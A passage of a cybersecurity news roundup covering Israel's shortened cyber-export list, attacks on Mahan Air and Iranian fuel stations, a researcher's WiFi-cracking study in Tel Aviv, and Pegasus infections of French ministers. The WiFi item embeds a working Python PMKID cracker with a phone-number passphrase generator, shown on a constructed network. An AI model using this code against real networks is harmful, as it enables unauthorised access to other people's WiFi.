"Cyber products like the one mentioned are supervised and licensed to be exported to governments only for purposes related to counter-terrorism and severe crimes," an embassy spokesperson said. "The licensing provisions are very clear and if these claims are true, it is a severe violation of these provisions."

Israel Limits Cyberweapons Export List from 102 to 37 Nations

 

The Israeli government has limited the number of nations to which local security businesses can sell surveillance and offensive hacking equipment by nearly two-thirds, reducing the official cyber export list from 102 to 37. 

The new list, obtained by the Israeli business publication Calcalist earlier today, includes only established democracies, such as European states and the Five Eyes countries: 

Australia, Austria, Belgium, Bulgaria, Canada, Croatia, Cyprus, Czech Republic, Denmark, Estonia, Finland, France, Germany, Greece, Iceland, India, Ireland, Italy, Japan, Latvia, Liechtenstein, Lithuania, Luxembourg, Malta, New Zealand, Norway, Portugal, Romania, Slovakia, Slovenia, South Korea, Spain, Sweden, Switzerland, the Netherlands, the UK, and the US. 

Autocratic regimes, to which Israeli companies have frequently sold surveillance tools, are conspicuously absent from the list. Spyware produced by Israeli firms such as Candiru and NSO Group has been linked to human rights abuses in dozens of countries in recent years, with local governments using the tools to spy on journalists, activists, dissidents, and political opponents. 

The government has not commented on the updated list, according to Calcalist journalists, and it has not said why the list was cut down earlier this month. The timing, however, suggests what may have driven the decision. 

The list was updated a week after a covert meeting between Israeli and French officials to address suspicions that NSO Group malware was deployed against French President Emmanuel Macron. The announcement coincided with the US sanctioning of four monitoring firms, including Israel's Candiru and NSO Group. 

The sanctions are reported to have sent NSO into a death spiral, with the company going from a prospective sale to French investors to losing its newly appointed CEO and possibly facing bankruptcy, as it has become persona non grata in the cyberweapons market. 

Azimuth Security co-founder Mark Dowd discussed Israel-based surveillance vendors and their tendency to sell to oppressive regimes in an episode of the Risky Business podcast last month, attributing it to the fact that these companies usually lack the connections in Western governments that would let them compete with Western vendors. 

With the Israeli Defense Ministry tightening restrictions on cyber exports to autocratic regimes, the shortened export list is likely to put a significant dent in Israel's estimated $10 billion surveillance sector.

As per a study released earlier this month by the Atlantic Council, there are roughly 224 firms providing surveillance and hacking tools, with 27 of them located in Israel.

Iran's Mahan Airline Targeted in Cyber Attack

 

A cyber-attack against Iran's second-largest airline, Mahan Air, has been thwarted, Iranian media reported on Sunday, adding that the airline's flight schedule was not affected.

"Mahan Air's computer system has suffered a new attack. It has already been the target on several occasions due to its important position in the country's aviation industry. Our internet security team is thwarting the cyberattack," airline spokesman Amir-Hossein Zolanvari told state television. 

According to the Daily Sabah, passengers could not access the airline's website for hours after the attack; it displayed an error saying the site could not be reached. Many Mahan Air customers across Iran also received unusual text messages from a group calling itself Hoosyarane-Vatan, which claimed to have carried out the attack. 

“We believe the public deserves to know the truth behind this cooperation and the money wasted on IRGC activities abroad while Iranian people suffer at home,” the hacking group said in a statement on the Telegram messaging app. 

Being an Iranian airline, Mahan Air has often found itself in the middle of a political storm. The carrier has been under US sanctions since 2011 for allegedly providing support to the Quds Force and has been associated with alleged shipments of arms from Iran to Shiite groups in Syria, including the Hezbollah terror group. Alleged Israeli airstrikes in Syria have been thought to target Mahan Air weapons shipments in the past. 

“Mahan Air has transported IRGC-QF operatives, weapons, equipment, and funds abroad in support of the IRGC-QF’s regional operations, and has also moved weapons and personnel for Hezbollah,” US Treasury stated in 2019. 

Iran, last month, accused Israel and the United States of a cyberattack on its gas stations that resulted in havoc at fuel pumps nationwide. Iranian President Ebrahim Raisi blamed the hack on anti-Iranian forces seeking to sow disorder and disruption across the nation. 

Days later, Israel's internet infrastructure was targeted by the Iranian Black Shadow hacking group, including against the largest Israeli LGBTQ dating site and an insurance firm. In July, the website of Iran's transport ministry was crippled by what state media said was a "cyber disruption" that caused delays in train services.

Iran Accuses USA and Israel for Carrying Out Fuel Cyberattacks

 

An Iranian general alleged that Israel and the US may have been behind a cyberattack that disrupted fuel sales at service stations across Iran. The attack, which took place on Tuesday, resembles two recent incidents, the Shahid Rajaei port incident and the railway disruption, which the general said had been analyzed and found to be similar, and which he likewise attributed to Iran's rivals, the US and Israel. Earlier this year, according to Iran's transportation ministry, a cyberattack disrupted its website and computer systems, the Fars news agency reports. 

"In a country where petrol flows freely at what are some of the lowest prices in the world, motorists need digital cards issued by the authorities. The cards entitle holders to a monthly amount of petrol at a subsidized rate and, once the quota has been used up, to buy more at the more expensive market rate," reports SecurityWeek. In 2020, the Washington Post reported that Israel had orchestrated an attack on the Iranian port of Shahid Rajaei, near the Strait of Hormuz, a strategic route for global oil shipments. 

The recent disruption caused traffic jams in parts of Tehran as long queues at petrol pumps spilled into the streets. Following the incident, the oil ministry shut down the service stations so that petrol could be distributed manually, the authorities said. On Wednesday, President Ebrahim Raisi alleged that the attackers were trying to turn the people of Iran against the Islamic Republic's leadership. According to the National Oil Products Distribution Company, an estimated 3,200 of the country's 4,300 service stations have since been reconnected to the central distribution system. 

Other stations also sell fuel to motorists, but at the unsubsidized rate, which is roughly double the subsidized price, around 5-6 US cents per litre. SecurityWeek reports: "Since 2010, when Iran's nuclear program was hit by the Stuxnet computer virus, Iran and its arch-foes Israel and the United States have regularly accused each other of cyberattacks. The conservative Fars news agency on Tuesday linked the breakdown to opponents ahead of the second anniversary of deadly protests sparked by a hike in petrol prices."

70% of WiFi Networks in Tel Aviv were Cracked by a Researcher

 

In his hometown of Tel Aviv, a researcher cracked 70% of a 5,000 WiFi network sample, demonstrating that residential networks are extremely vulnerable and easy to hijack. Ido Hoorvitch, a CyberArk security researcher, first strolled about the city center using WiFi sniffing equipment to collect a sample of 5,000 network hashes for the study. 

The researcher then exploited a weakness that allows the extraction of a PMKID hash, a value access points normally generate to support fast roaming. To collect PMKIDs, Hoorvitch sniffed traffic on Ubuntu using a $50 network card capable of monitor mode and packet injection. 

Although Hoorvitch stressed that this form of attack does not require heavy-duty hardware, the team ran the cracking on a 'monster' rig in CyberArk Labs made up of eight Quadro RTX 8000 (48GB) GPUs. The attack is based on a technique found by Hashcat's lead developer, Jens 'atom' Steube, which can be used to obtain PMKID hashes and crack network passwords offline.

"Atom’s technique is clientless, making the need to capture a user’s login in real-time and the need for users to connect to the network at all obsolete," explains Hoorvitch in the report. "Furthermore, it only requires the attacker to capture a single frame and eliminate wrong passwords and malformed frames that are disturbing the cracking process." 

Cracking works by combining each candidate passphrase with the network's SSID to derive a PMK, computing the PMKID that PMK would produce, and comparing it with the PMKID captured from the access point; a match reveals the correct WiFi password. This lets PMKID hashes gathered by any wireless sniffer with monitor mode enabled be cracked offline. Hoorvitch captured the PMKID hashes with the hcxdumptool utility, then used a conversion tool and the password recovery software Hashcat to crack them. 

According to Hoorvitch, many Tel Aviv residents use their cellphone numbers as their WiFi password, thus it wasn't long before hashes were cracked, passwords were obtained, and doors to their networks were opened. Each crack on the researcher's laptop took around nine minutes in these circumstances. The team was able to break into over 3,500 WiFi networks in and around Tel Aviv. 
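The PMKID derivation and the clientless cracking loop described above, as an added example that is not CyberArk's or Hoorvitch's code: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds) and PMKID = HMAC-SHA1(PMK, "PMK Name" || AP MAC || client MAC) truncated to 128 bits, as specified for WPA2-PSK. The SSID, MAC addresses and passphrase below are constructed for the demonstration, and the hashcat-22000 line is built by the same code rather than taken from a real capture; the phone-number candidate generator mirrors the observation that many residents used their mobile number as the passphrase.

```python
import hashlib
import hmac
import itertools
from typing import Iterable, Optional, Tuple


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK pairwise master key: PBKDF2-HMAC-SHA1, SSID as salt, 4096 rounds, 32 bytes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def compute_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """802.11i PMKID: first 128 bits of HMAC-SHA1(PMK, "PMK Name" || AP MAC || client MAC)."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def make_22000_line(pmkid: bytes, ap_mac: bytes, sta_mac: bytes, ssid: str) -> str:
    """Serialise a PMKID in the hashcat 22000 format (type 01); the EAPOL fields stay empty."""
    return "WPA*01*{}*{}*{}*{}***".format(
        pmkid.hex(), ap_mac.hex(), sta_mac.hex(), ssid.encode().hex())


def parse_22000_line(line: str) -> Tuple[bytes, bytes, bytes, str]:
    """Return (pmkid, ap_mac, sta_mac, ssid) from a type-01 hashcat 22000 line."""
    fields = line.strip().split("*")
    if len(fields) < 6 or fields[0] != "WPA" or fields[1] != "01":
        raise ValueError("not a PMKID (type 01) hash line")
    return (bytes.fromhex(fields[2]), bytes.fromhex(fields[3]),
            bytes.fromhex(fields[4]), bytes.fromhex(fields[5]).decode())


def phone_candidates(prefix: str, digits: int) -> Iterable[str]:
    """Enumerate numeric passphrases prefix + <digits> trailing digits (a hashcat mask like 05412?d?d?d)."""
    for tail in itertools.product("0123456789", repeat=digits):
        yield prefix + "".join(tail)


def crack_pmkid(line: str, candidates: Iterable[str]) -> Optional[str]:
    """Clientless offline attack: no handshake and no connected client needed, only the captured PMKID."""
    pmkid, ap_mac, sta_mac, ssid = parse_22000_line(line)
    for passphrase in candidates:
        if hmac.compare_digest(compute_pmkid(derive_pmk(passphrase, ssid), ap_mac, sta_mac), pmkid):
            return passphrase
    return None


def ieee_test_vector_ok() -> bool:
    """Sanity check of derive_pmk against the IEEE 802.11i Annex H vector (passphrase 'password', SSID 'IEEE')."""
    expected = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"
    return derive_pmk("password", "IEEE").hex() == expected


if __name__ == "__main__":
    # Constructed network: a home SSID whose passphrase is an Israeli-style mobile number.
    ssid, secret = "TLV-Home", "0541234567"          # assumed values, not from the report
    ap_mac = bytes.fromhex("a42bb0112233")          # assumed AP BSSID
    sta_mac = bytes.fromhex("f0d5bf445566")         # assumed attacker/client MAC
    # What hcxdumptool + hcxpcapngtool would hand to hashcat, built here instead of captured.
    line = make_22000_line(compute_pmkid(derive_pmk(secret, ssid), ap_mac, sta_mac),
                           ap_mac, sta_mac, ssid)
    print("PBKDF2 self-test:", ieee_test_vector_ok())
    print("hash line:", line)
    print("recovered:", crack_pmkid(line, phone_candidates("0541234", 3)))
```

The `crack_pmkid` loop is what hashcat mode 22000 does on GPUs: for a 10-digit mobile number the keyspace is at most a few hundred million PBKDF2 evaluations, which is why the report's nine minutes per network on a laptop is plausible, and why a long, non-numeric passphrase pushes the same attack out of reach.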

Despite the risk, most consumers do not set a strong password on their WiFi networks, according to the report. Passwords should be at least ten characters long, mix lower and upper case letters, symbols, and digits, and be unique to the network. Keeping router firmware up to date also protects the hardware against attacks that exploit known vulnerabilities, the researcher notes, and WEP, WPA1, and other weak encryption protocols should be disabled as well.

5 French Minister Phones Affected with Pegasus Spyware

 

The mobile phones of at least five French ministers and of President Emmanuel Macron's diplomatic adviser were infected with the Israeli-made Pegasus spyware, people familiar with the investigation confirmed on Friday, 24 September. 

According to a Mediapart report on Friday, French security agencies found traces of the software while inspecting the phones, with compromises dated to 2019 and 2020. 

Pegasus, produced by the Israeli company NSO Group, was already at the centre of a storm in July, after a list of around 50,000 possible surveillance targets worldwide leaked to the media. The spyware can switch on a phone's camera or microphone and harvest its data. 

The disclosure came about two months after the Pegasus Project, the media consortium that included the Guardian, found that the leaked database at the core of its investigation contained the contact details of top French officials, including President Emmanuel Macron and most of his 20-strong cabinet. 

There is no strong proof of successful hacking of phones of the five cabinet members however media reports suggest that the devices were targeted by the potent spyware known as Pegasus, which is created by the NSO Group. 

Once successfully installed by the Israeli firm's government customers, Pegasus lets them monitor calls, text messages, pictures, and location, and can turn phones into remotely controlled listening devices. 

The Pegasus Project consortium, coordinated by the French non-profit media organization Forbidden Stories, showed that NSO's customers around the world had used the hacking tool against journalists and human rights organizations. 

NSO has said that its powerful spyware is intended for investigating serious criminals, not members of civil society. It says it has no link to the leaked database reviewed by the Pegasus Project and that the tens of thousands of numbers it contains are not targets of NSO customers. It has also firmly denied that Pegasus was ever used to target Macron. 

In a statement released on Thursday night, NSO said: “We stand by our previous statements regarding French government officials. They are not and have never been Pegasus targets. We won’t comment on anonymous source allegations.” 

The allegation was confirmed by two French individuals with knowledge of the inquiry, who asked not to be named because they were not authorized to speak to the media. 

"My phone is one of those checked out by the national IT systems security agency, but I haven't yet heard anything about the investigation so I cannot comment at this stage," minister Emmanuelle Wargon told the L'Opinion website on Friday. 

Mediapart reported that the handsets of education minister Jean-Michel Blanquer, Jacqueline Gourault, Julien Denormandie, Emmanuelle Wargon, Sébastien Lecornu, and others showed signs of Pegasus infection. The report noted that at the time of the alleged targeting, in 2019 and less often in 2020, not all of them held their current portfolios, but all were ministers. The phone of Macron's diplomatic adviser at the Élysée Palace was also targeted. 

The Élysée Palace also stated that it would not comment on “long and complex investigations which are still ongoing”. 

The prosecutor's office declined to comment or to confirm whether the ministers' phones had been found to be hacked, saying the investigation was covered by judicial confidentiality rules. Since the end of July, when palace officials urged caution, the Élysée has not commented on the Pegasus affair beyond saying there was "no certainty at this stage".